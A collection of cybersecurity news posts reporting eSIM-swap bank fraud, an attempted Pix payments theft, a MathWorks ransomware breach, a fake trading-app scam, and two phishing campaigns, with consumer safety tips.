On August 29, 2025, at approximately 1:00 PM, Kaul received a phone call from fraudsters claiming to be Airtel representatives. The callers convinced her that she needed to upgrade her SIM card from 4G to 5G as per company policy, presenting the upgrade as mandatory. Unaware of the deceptive nature of the call, Kaul stayed on the line with the fraudsters throughout the process.

Technical manipulation

At 1:10 PM, Kaul received an SMS from Airtel containing an OTP for eSIM card activation. Following this, she received a long numerical message on WhatsApp, along with subsequent SIM card update-related messages and additional calls from both the fraudsters and legitimate Airtel representatives. The victim shared the OTP with the callers, inadvertently giving them access to activate an eSIM on their own device, effectively hijacking her phone number. 

Once the fraudsters gained control of Kaul's phone number through the eSIM activation, they systematically drained her bank accounts. The theft occurred through more than 50 separate transactions between August 31 and September 1, 2025, targeting both her Axis Bank and HDFC Bank accounts. The total amount stolen reached ₹18.48 lakh. 

Discovery and legal action

Kaul discovered the fraud when her SIM card became inactive and she stopped receiving messages. Upon visiting her banks, employees informed her about the unauthorized transactions that had occurred over the previous days. She subsequently filed a complaint with the cyber crime police station, and an investigation has been launched.

This incident highlights the growing threat of eSIM-based fraud in India, where criminals exploit the convenience of digital SIM technology to rapidly hijack mobile numbers and access victims' financial accounts through intercepted OTPs. 

Safety tips 

Never share OTPs or activation codes: Avoid sharing one-time passwords (OTPs), eSIM activation codes, or QR codes with anyone, even if they claim to be from your telecom provider. No legitimate company will request these details over phone or SMS. 

Use only official channels: Always request eSIM conversions or upgrades directly through official carrier apps, websites, or physical stores. Do not click on unknown links, and never proceed with eSIM activation from unsolicited messages or calls . 

Act fast on signal loss: If your phone unexpectedly loses network signal or displays “No Service,” immediately report the issue to your mobile operator and notify your bank. This could indicate that your number has been hijacked.

Stay alert for phishing attempts: Be wary of calls, emails, or texts asking for personal, banking, or SIM-related information. Always verify the identity of the sender by reaching out through the provider’s verified customer care number. 

Monitor account activity: Regularly review bank and mobile account activity for unauthorized transactions or account changes. Set up alerts where available for any transaction or SIM change activity.

Following these safety steps drastically reduces the risk of eSIM-based fraud and helps in swift detection of account compromise.
Read more »
Theft
Banks Brazil Cyber Fraud Fintech Theft

Hackers Target Brazilian Payments Provider in Attempted $130 Million Theft

 



A concerning cyber incident has shaken Brazil’s financial technology sector after criminals attempted to steal nearly $130 million through the country’s real-time payments network, Pix. The breach was detected on August 29, 2025, when Sinqia S.A., a São Paulo-based financial software company owned by Evertec, noticed unauthorized activity in its systems.


What Happened

According to Evertec’s disclosure to the U.S. Securities and Exchange Commission, attackers gained entry into Sinqia’s Pix environment and tried to initiate unauthorized business-to-business transfers. Pix, operated by the Central Bank of Brazil, is an instant payments platform that has become the country’s most widely used method for digital transfers since its launch in 2020.

The attempted theft targeted two financial institutions connected to Sinqia’s services. Once the suspicious activity was detected, Sinqia suspended all Pix-related transactions and brought in external cybersecurity experts to investigate.


How the Attackers Broke In

Initial findings show that the hackers gained access by using stolen credentials belonging to an IT service provider. By leveraging legitimate login details, they were able to penetrate Sinqia’s Pix environment and attempt large-scale transfers. This method, often referred to as a supply chain or vendor compromise, has become increasingly common in financial cyberattacks because it exploits trusted third-party relationships.

So far, Evertec has found no evidence that the breach extended beyond Sinqia’s Pix systems or that customer data was exposed.


Response and Recovery

As a precaution, the Central Bank of Brazil revoked Sinqia’s access to Pix until it can confirm the environment is secure. This suspension directly affects 24 financial institutions that rely on Sinqia to process instant transfers. The company has stated that some of the stolen funds have already been recovered, though it has not disclosed the amount. Recovery efforts are still underway, and the overall financial and reputational impact remains uncertain.

Evertec acknowledged that the consequences could be “material,” particularly in relation to customer trust and the company’s internal controls. Investigations are ongoing, and Sinqia continues to work with regulators and forensic experts to restore secure access to Pix.


Why This Matters

The case stresses upon the risks facing modern payment systems that operate at high speed and high volume. Pix is widely used in Brazil for everything from personal transfers to business payments, making it an attractive target for cybercriminals. By exploiting vendor credentials, attackers can bypass traditional defenses and reach critical financial infrastructure.

For banks, service providers, and regulators, the incident underscores the importance of constant vigilance, strict vendor oversight, and layered defenses against credential theft. For users, it is a reminder of both the convenience and the risks that come with instant payment systems.

Investigations are still unfolding, and more details are expected in the coming weeks as Evertec and Brazilian authorities work to close the breach and strengthen protections.



Read more »
Ransomware attack
Cyber Fraud Data Stolen MathWorks Ransomware attack

MathWorks Confirms Ransomware Incident that Exposed Personal Data of Over 10,000 People

 




MathWorks, the company behind MATLAB and Simulink, has confirmed a ransomware attack that disrupted several of its online services and internal systems. The company said the disruption affected services customers use to sign in and manage software, and that it alerted federal law enforcement while investigating the incident. 

According to state notifications filed with regulators, the attack resulted in the unauthorized access and theft of personal information for 10,476 people. These filings list the full count reported to state authorities. 


What was taken and who is affected

The company’s notices explain that the records exposed vary by person, but may include names, postal addresses, dates of birth, Social Security numbers, and in some cases non-U.S. national ID numbers. In short, the stolen files could contain information that makes victims vulnerable to identity theft. 

MathWorks’ own statements and regulatory notices put the window of unauthorized access between April 17 and May 18, 2025. The company discovered the breach on May 18 and publicly linked the outage of several services to a ransomware incident in late May. MathWorks says forensic teams contained the threat and that investigators found no ongoing activity after May 18. 


What is not yet known 

MathWorks has not identified any named ransomware group in public statements, and so far there is no verified public evidence that the stolen data has been published or sold. The company continues to monitor the situation and has offered identity protection services for those notified. 


What you can do 

If you use MathWorks products, check your account notices and follow any enrollment instructions for identity protection. Monitor financial and credit accounts, set up fraud alerts if you see suspicious activity, and change passwords for affected services. If you receive unusual messages or requests for money or personal data, treat them with suspicion and report them to your bank or local authorities.

Keep an eye on financial activity: Regularly review your bank and credit card statements to spot unauthorized transactions quickly.

Consider credit monitoring or freezes: In countries where these services are available, they can help detect or prevent new accounts being opened in your name.

Reset passwords immediately: Update the password for your MathWorks account and avoid using the same password across multiple platforms. A password manager can help create and store strong, unique passwords.

Enable multi-factor authentication: Adding a second layer of verification makes it much harder for attackers to gain access, even if they have your login details.

Stay alert for phishing attempts: Be cautious of unexpected emails, calls, or texts asking for sensitive information. Attackers may use stolen personal details to make their messages appear more convincing.



Read more »
User Security
Cyber Fraud Financial Scam India Online Trading Scam Trading App User Security

India's Biggest Cyber Fraud: Businessman Duped of ₹25 Crore Through Fake Trading App

 

A Kochi-based pharmaceutical company owner has suffered a loss of ₹25 crore in what is being described as the largest single-person cyber fraud case in India. 

The incident involved a sophisticated online trading scam, executed through a fake trading application that lured the victim with promises of lucrative returns. Despite being an experienced trader, the businessman fell prey to deception after engaging with the fraudulent app for nearly two years.

The scam unfolded over four months, during which the victim was lured by substantial profits displayed on his initial investments. These early gains convinced him of the app’s legitimacy, prompting more substantial investments.

Investigators from the Cyber Cell revealed that the app consistently showed double profits, creating an illusion of credibility and financial success. This psychological manipulation is a common tactic used by cyber fraudsters to build trust and encourage deeper engagement from unsuspecting victims. 

Trouble began when the businessman attempted to withdraw his funds, only to be met with repeated delays and a variety of excuses from the operators of the fake platform. As withdrawal requests were consistently stonewalled, suspicion grew. It was only after persistent failed attempts to access his money that the reality of the fraud became clear to the victim. 

Upon reporting the crime, swift action was taken by law enforcement. The Indian Cyber Crime Coordination Centre was immediately alerted and subsequently forwarded the information to the Thiruvananthapuram Cyber Operations Headquarters. A formal case was registered, and efforts have been initiated to freeze the remaining funds before they could be routed to additional accounts.

Investigation revealed that the fraudulent app was under the control of a foreign national, indicating possible international links and making the operation broader and more complex. The case has prompted a larger crackdown on similar cyber threats, with the Cyber Cell widening its probe to trace the perpetrators and prevent further occurrences. 

This incident highlights the growing sophistication of online financial scams in India, emphasizing the need for increased vigilance, especially even among experienced investors. Awareness and prompt reporting remain essential defenses against such evolving cyber threats.
Read more »
User Privacy
Credential Theft Cyber Fraud Data Leak Netflix Job Scam User Privacy

Fake Netflix Job Offers Target Facebook Credentials in Real-Time Scam

 

A sophisticated phishing campaign is targeting job seekers with fake Netflix job offers designed to steal Facebook login credentials. The scam specifically focuses on marketing and social media professionals who may have access to corporate Facebook business accounts. 

Modus operandi 

The attack begins with highly convincing, AI-generated emails that appear to come from Netflix's HR team, personally tailored to recipients' professional backgrounds. When job seekers click the "Schedule Interview" link, they're directed to a fraudulent career site that closely mimics Netflix's official page. 

The fake site prompts users to create a "Career Profile" and offers options to log in with Facebook or email. However, regardless of the initial choice, victims are eventually directed to enter their Facebook credentials. This is where the scam becomes particularly dangerous. 

Real-time credential theft 

What makes this attack especially sophisticated is the use of websocket technology that allows scammers to intercept login details as they're being typed. As Malwarebytes researcher Pieter Arntz explains, "The phishers use a websocket method that allows them to intercept submissions live as they are entered. This allows them to try the credentials and if your password works, they can log into your real Facebook account within seconds". 

The attackers can immediately test stolen credentials on Facebook's actual platform and may even request multi-factor authentication codes if needed. If passwords don't work, they simply display a "wrong password" message to maintain the illusion. 

While personal Facebook accounts have value, the primary goal is accessing corporate social media accounts. Cybercriminals seek marketing managers and social media staff who control company Facebook Pages or business accounts. Once compromised, these accounts can be used to run malicious advertising campaigns at the company's expense, demand ransom payments, or leverage the organization's reputation for further scams.

Warning signs and protection

Security researchers have identified several suspicious email domains associated with this campaign, including addresses ending with @netflixworkplaceefficiencyhub.com, @netflixworkmotivation, and @netflixtalentnurture.com. The fake hiring site was identified as hiring.growwithusnetflix[.]com, though indicators suggest the operators cleared their tracks after the scam was exposed. 

Job seekers should be cautious of unsolicited job offers, verify website addresses carefully, and remember that legitimate Netflix recruitment doesn't require Facebook login credentials. The campaign demonstrates how scammers exploit both job market anxiety and the appeal of working for prestigious companies to execute sophisticated credential theft operations.
Read more »
User Security
Cyber Fraud Japanese Hiragana Phishing scam Phony URLs User Security

New Phishing Scam Uses Japanese Character to Perfectly Mimic Legitimate URLs

 

Cybersecurity researchers have recently flagged a highly sophisticated phishing campaign that leverages a unique tactic: the use of the Japanese hiragana character “ん” to mimic the appearance of a forward slash (“/”) in website URLs. This technique is especially effective on certain fonts and browser systems, making phony URLs appear nearly identical to legitimate ones, thus tricking even vigilant internet users. 

The campaign’s primary target is customers of the travel platform Booking.com. Instead of the real URL containing forward slashes, attackers craft addresses using the “ん” character, such as “https://account.booking[.]comんdetailんrestric-access.www-account-booking[.]comんen/”. On first glance, these URLs look authentic, but they redirect users to fraudulent domains controlled by cybercriminals.

The malicious strategy starts with phishing emails containing these deceptive links. When clicked, users are sent to sites that deliver MSI installer files, which may secretly install malware like information stealers or remote access trojans on victim devices. 

This approach is part of a broader trend known as homograph attacks. Cybercriminals exploit visual similarities between characters from different Unicode sets, using them to spoof trusted domains. Previously, attackers have used Cyrillic letters to impersonate Latin ones; the use of Japanese “ん” adds a clever new layer to these deceptions. 

According to the 2025 Phishing Trends Report, homograph attacks are evolving and becoming harder to filter out, as criminals strive to defeat security systems and bypass standard defenses. 

Safety tips 

Security experts recommend multiple protective strategies. Users should hover over links to reveal actual destination URLs, though this has limitations with sophisticated character spoofing. Modern browsers like Chrome have implemented protections against many homograph attacks, but visual URL inspection alone is insufficient. 

The most effective defense combines updated security software, email filtering, and comprehensive user education about evolving attack vectors. This campaign demonstrates how cybercriminals continuously adapt their techniques to exploit even subtle visual ambiguities in digital communication systems. 

Ultimately, this new phishing campaign highlights cybercriminals’ constant creativity in exploiting even the smallest ambiguities in digital communication. As attackers continue to adapt their methods, organizations and individuals need to stay aware of these rapidly advancing attack vectors and double down on multi-layered security measures.
Read more »
Subscribe to: Comments (Atom)